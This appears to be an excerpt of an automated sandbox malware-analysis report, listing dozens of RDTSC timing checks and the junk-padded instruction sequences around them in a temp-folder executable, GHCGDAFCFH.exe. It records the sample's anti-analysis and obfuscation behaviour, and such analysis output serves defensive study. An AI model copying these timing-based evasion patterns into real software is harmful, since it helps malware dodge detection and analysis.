Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9418AA second address: 9418AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 948B15 second address: 948B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F208Ah 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 95E353 second address: 95E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 95FFB6 second address: 95FFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBF8C4F2086h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 95FFC2 second address: 95FFC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 960127 second address: 960134 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97970B second address: 979710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979710 second address: 979716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979716 second address: 97971A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97971A second address: 97972A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FBF8C4F2086h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97972A second address: 979748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979748 second address: 97976E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FBF8C4F2098h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979C00 second address: 979C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979C06 second address: 979C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979E92 second address: 979EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FBF8C4F2A52h 0x0000000d jno 00007FBF8C4F2A46h 0x00000013 jno 00007FBF8C4F2A46h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979EAE second address: 979EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF8C4F2086h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9802A6 second address: 9802BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97FE4D second address: 97FE53 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97FE53 second address: 97FE5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97FE5A second address: 97FE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBF8C4F2086h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97FE69 second address: 97FE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 981DF2 second address: 981E00 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF8C4F2088h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 981E00 second address: 981E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF8C4F2A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030F15 second address: 5030F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030F24 second address: 5030F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060EE7 second address: 5060F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF8C4F2090h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50001B1 second address: 50001DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF8C4F2A57h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50001F7 second address: 50001FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50001FB second address: 5000201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000201 second address: 5000207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000207 second address: 500020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 500020B second address: 500020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 500020F second address: 500021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 500021E second address: 5000224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020AC5 second address: 5020ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020ACB second address: 5020AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020AD1 second address: 5020AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020AD5 second address: 5020AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020AD9 second address: 5020B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, di 0x0000000d pushad 0x0000000e mov al, dh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FBF8C4F2A4Fh 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov ah, A7h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50206EE second address: 5020712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF8C4F208Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020712 second address: 502072A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, 909Dh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 502072A second address: 5020757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF8C4F2090h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020757 second address: 5020766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020766 second address: 502077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF8C4F208Ah 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50205EE second address: 5020634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, eax 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cl, bl 0x00000014 pushfd 0x00000015 jmp 00007FBF8C4F2A4Ah 0x0000001a and esi, 1D674558h 0x00000020 jmp 00007FBF8C4F2A4Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020634 second address: 502064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2094h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 502037D second address: 50203A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov ecx, 2C7F8247h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, 591EE76Ah 0x00000018 call 00007FBF8C4F2A4Bh 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030158 second address: 503015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 503015C second address: 503016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 503016F second address: 5030175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030175 second address: 5030179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030179 second address: 50301A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a call 00007FBF8C4F208Ah 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBF8C4F2092h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50301A8 second address: 50301AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50301AE second address: 50301F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FBF8C4F2098h 0x0000000b xor ax, 7058h 0x00000010 jmp 00007FBF8C4F208Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBF8C4F2095h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50301F9 second address: 503021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 81h 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d jmp 00007FBF8C4F2A50h 0x00000012 push eax 0x00000013 push edx 0x00000014 mov edi, esi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060DC2 second address: 5060E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBF8C4F208Dh 0x00000012 add ecx, 58D97FF6h 0x00000018 jmp 00007FBF8C4F2091h 0x0000001d popfd 0x0000001e mov edi, ecx 0x00000020 popad 0x00000021 pushfd 0x00000022 jmp 00007FBF8C4F208Ch 0x00000027 adc cl, 00000018h 0x0000002a jmp 00007FBF8C4F208Bh 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 jmp 00007FBF8C4F2096h 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c call 00007FBF8C4F208Ch 0x00000041 pop esi 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060E51 second address: 5060EA0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF8C4F2A4Bh 0x00000008 sub eax, 6A1DEB3Eh 0x0000000e jmp 00007FBF8C4F2A59h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, 6D12BE87h 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBF8C4F2A54h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060EA0 second address: 5060EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060EA4 second address: 5060EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 504031A second address: 5040320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5040320 second address: 504032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 504032A second address: 5040406 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF8C4F2096h 0x00000008 adc ah, 00000028h 0x0000000b jmp 00007FBF8C4F208Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushad 0x00000017 mov si, dx 0x0000001a mov di, 3C70h 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007FBF8C4F2099h 0x00000025 sbb ecx, 2221B5F6h 0x0000002b jmp 00007FBF8C4F2091h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FBF8C4F208Ch 0x0000003b adc cx, 3F18h 0x00000040 jmp 00007FBF8C4F208Bh 0x00000045 popfd 0x00000046 mov bl, cl 0x00000048 popad 0x00000049 mov eax, dword ptr [ebp+08h] 0x0000004c pushad 0x0000004d mov di, 56F4h 0x00000051 mov dx, EE60h 0x00000055 popad 0x00000056 and dword ptr [eax], 00000000h 0x00000059 pushad 0x0000005a mov ebx, 2D9A2978h 0x0000005f push eax 0x00000060 push edx 0x00000061 pushfd 0x00000062 jmp 00007FBF8C4F2097h 0x00000067 adc si, 613Eh 0x0000006c jmp 00007FBF8C4F2099h 0x00000071 popfd 0x00000072 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5040406 second address: 5040445 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF8C4F2A50h 0x00000008 jmp 00007FBF8C4F2A55h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 and dword ptr [eax+04h], 00000000h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF8C4F2A4Dh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020466 second address: 502046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 502046A second address: 5020487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020487 second address: 50204BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBF8C4F208Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FBF8C4F208Ch 0x00000018 push esi 0x00000019 pop edi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50204BE second address: 5020514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FBF8C4F2A4Bh 0x00000012 pushfd 0x00000013 jmp 00007FBF8C4F2A58h 0x00000018 or ecx, 76386188h 0x0000001e jmp 00007FBF8C4F2A4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020514 second address: 5020578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F208Fh 0x00000009 and si, 85CEh 0x0000000e jmp 00007FBF8C4F2099h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov edi, 2093105Ch 0x00000022 mov edx, 5F6ED648h 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FBF8C4F2099h 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020578 second address: 502057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 502057C second address: 5020582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020582 second address: 5020599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2A53h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030E72 second address: 5030E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 504013B second address: 5040148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5040148 second address: 504014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 504014C second address: 5040165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5040165 second address: 5040175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506065D second address: 5060677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov di, C338h 0x00000012 push ebx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov ax, di 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060677 second address: 50606B9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF8C4F208Fh 0x00000008 and al, FFFFFFFEh 0x0000000b jmp 00007FBF8C4F2099h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF8C4F208Dh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50606B9 second address: 50606E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, A2h 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBF8C4F2A4Eh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50606E7 second address: 50606ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
